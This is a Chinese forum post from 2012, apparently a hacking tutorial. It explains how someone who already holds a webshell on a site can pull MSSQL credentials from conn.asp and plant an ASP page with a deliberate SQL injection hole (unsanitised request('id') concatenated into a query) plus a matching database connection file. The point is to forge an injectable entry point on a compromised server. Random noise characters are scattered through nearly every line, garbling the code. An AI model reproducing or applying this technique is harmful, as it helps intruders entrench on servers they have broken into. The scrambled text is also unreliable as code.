首先你要拿了一个webshell,这样你找到连接数据库的文件,大多都是conn.asp这个文件里面有mssql的用户和密码,你要找到用户名、密码、数据库所在的IP,然后连接上去,至于连接大家应该都会,找到网站管理员的表。因为我测试的时候是用管理员的表,我朋友说任何表名都可以,只要这个表存在,代码如下:
" [4 n1 R" ?: GASP/Visual Basic代码- k7 y9 j- {( ^+ {' E( ?( O& Z1 K
<!--#include file="xx.asp"--> / [2 x v2 y% P. x
<%
# _* V, ?& F6 `( Eset rs=server.createobject("ADODB.recordset") 7 A. y( n2 G; ]# ]& f/ G% \
id = request("id")
' B, o: b9 r5 r) s" Y+ W& }8 SstrSQL = "select * from admin where id=" & id 6 ~# P5 Y5 _1 n6 T8 o: P/ D
rs.open strSQL,conn,1,3 1 `. ]8 o$ \- {
rs.close 7 w" m7 M% X) M" o9 m: ?$ D
%>
* l- z2 [2 r% k; L把strSQL = "select * from admin where id=" & id 这句话里面的admin换成要伪造的表名,注意必须存在。你可以连接上去看下表名就是了!这里假设的是admin是表名!这个文件名随便保存!
1 U% a i. f9 `. t/ h; K然后就要构造一个连接数据库的文件了,代码如下:
9 p; u2 l1 i1 \" KASP/Visual Basic代码
. R" ~# J; Z* M% z6 y<% 3 Y& _6 {9 U4 W& y. D
strSQLServerName = "000.000.000.000" '服务器名称或地址 3 Z" K r! O9 {7 ]2 u# p
strSQLDBUserName = "sqlname" '数据库帐号
( K# ~: _% p7 H& M* z9 YstrSQLDBPassword = "sqlpass" '数据库密码 : [+ i! R$ S- M) y$ o, @8 f
strSQLDBName = "sqldataname" '数据库名称
3 k" S) {, q6 g$ ?Set conn = Server.CreateObject("ADODB.Connection")
' L0 t$ y( X9 L* l4 v7 OstrCon = "rovider=SQLOLEDB.1ersist Security Info=False;Server=" & strSQLServerName & ";User ID=" & strSQLDBUserName & "assword=" & strSQLDBPassword & ";Database=" & strSQLDBName & ";" $ X& o" p7 X8 C9 N: v5 |* ?4 h
conn.open strCon 2 Z: g7 _7 ~# {) r& ~" X% O
%> * b/ \" c, W1 |+ J( [* s
这里应该都会了,就不罗嗦了,不过注意的是保存的文件名要和include调用的名字一样。就这样,正常情况下,就OK了,伪造成功* ` \2 J4 v' S5 E0 X
|
发表于 2012-9-13 17:53:08
收藏
支持
反对